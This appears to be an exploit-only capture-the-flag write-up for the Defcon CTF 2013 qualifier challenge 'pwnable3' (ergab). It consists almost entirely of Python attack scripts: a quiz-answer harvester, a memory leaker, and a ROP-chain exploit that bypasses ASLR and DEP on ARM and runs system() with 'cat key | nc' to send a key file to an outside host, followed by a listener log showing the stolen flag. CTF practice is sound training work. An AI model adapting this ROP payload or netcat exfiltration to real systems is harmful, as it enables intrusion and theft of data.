CTF/2013

Defcon CTF 2013 Qual - pwnable3 (Exploit only)

pwn3r_45 2013. 7. 7. 19:05

Category : Pwnables


ergab

Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass



gen_answer_dict.py 

import re

from socket import *

from struct import pack, unpack


HOST = "lolergab.shallweplayaga.me"

PORT = 5000


def SaveFile(data):

f = open('dic.txt', 'r')

if f.read().find(data) != -1:

f.close()

return

f.close()


f = open('dic.txt', 'at')

f.write(data)

f.close()


def Attack(s):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

data = re.search('1\) (.*)', l[1])

choice = data.group(1)

s.send("1\n")

if s.recv(1024).find('Wrong!!') == -1:

SaveFile(quest + ":" + choice + "\n")

print 'OK'

return 0


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

while True:

main() 




leak_memory.py 

import re

from socket import *

from struct import pack, unpack

import time, sys


p = lambda x: pack("<L", x)


HOST = "lolergab.shallweplayaga.me"

#HOST = "192.168.0.171"

PORT = 5000


senddata = 0x3C9C


payload = ""

payload += "a"*0x0f+"\n"


def GetDatabase():

dic = {}

f = open('dic.txt', 'r')

for line in f:

line = line.strip('\n')

(quest, answer) = line.split(':')

#print dic, " ", quest, " ", answer

dic[quest] = answer

f.close()

return dic


def Attack(s):

dic = GetDatabase()

for _ in range(5):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

answer = dic[quest]

choice = 0

for i in range(1, 4+1):

if l[i].find(answer) != -1:

choice = i

break

s.send(str(choice) + '\n')

s.recv(1024)

print s.recv(1024)

time.sleep(1)

        raw_input(">")

s.send(payload)

time.sleep(1)

print s.recv(1024)

return 0


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

main() 



Exploit

import re

from socket import *

from struct import pack, unpack

import time, sys


p = lambda x: pack("<L", x)


HOST = "lolergab.shallweplayaga.me"

PORT = 5000


base = 0xb6f54000 # server

##base = 0xb6faf000 # local

system = 0xb6cbbbd8  # server

##system = 0xb6d19bd8 # local

sleep = 0xb6d1af30 # server

freespace = 0x0000d558

senddata = 0x3C9C

recvdata = 0x3DC4

command = "cat key | nc bean.b10s.org 31337\x00"


"""

.text:000045FC 07 00 A0 E1                             MOV     R0, R7

.text:00004600 08 10 A0 E1                             MOV     R1, R8

.text:00004604 0A 20 A0 E1                             MOV     R2, R10

.text:00004608 01 40 84 E2                             ADD     R4, R4, #1

.text:0000460C 33 FF 2F E1                             BLX     R3

.text:00004610 06 00 54 E1                             CMP     R4, R6

.text:00004614 F7 FF FF 1A                             BNE     loc_45F8

.text:00004618 F8 85 BD E8                             LDMFD   SP!, {R3-R8,R10,PC}

"""



payload = ""

payload += "a"*0x10

payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC}

#############################

payload += p(base+0x00004624) # .text:00004624                 BX      LR

payload += p(0x00000000) * 2

payload += p(0x00000001)

payload += p(0x00000004) # r0

payload += p(base+freespace) # r1

payload += p(len(command)) # r2

############################

payload += p(base+0x000045FC)

############################

payload += p(0x000000de)

payload += p(0x11111111)*6

############################

#payload += p(sleep)

payload += p(base+recvdata)

###########################

payload += p(0x11111111)*7

##########################

payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC}

###########################

payload += p(base+0x00004624) # .text:00004624                 BX      LR

payload += p(0x00000000)*2

payload += p(0x00000001)

payload += p(base+freespace)

payload += p(0x00000001)*2

###########################

payload += p(base+0x000045FC)

##########################

payload += p(0x11111111)*7

##########################

payload += p(system)

##########################

payload += "\n"


def GetDatabase():

dic = {}

f = open('dic.txt', 'r')

for line in f:

line = line.strip('\n')

(quest, answer) = line.split(':')

#print dic, " ", quest, " ", answer

dic[quest] = answer

f.close()

return dic


def Attack(s):

dic = GetDatabase()

for _ in range(5):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

answer = dic[quest]

choice = 0

for i in range(1, 4+1):

if l[i].find(answer) != -1:

choice = i

break

s.send(str(choice) + '\n')

s.recv(1024)

print s.recv(1024)

time.sleep(1)

s.send(payload)

s.send(command)

time.sleep(1)

print s.recv(1024)


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

main()




root@ubuntu:~# ./exploit.py


--------------------------------------------------------------------


root@ubuntu:~# nc -lv 31337

Connection from 131.247.27.200 port 80 [tcp/http] accepted

The key is: Hang on, I know what I need. Fish fingers. And custard. 




Co written with StolenByte

저작자표시 (새창열림)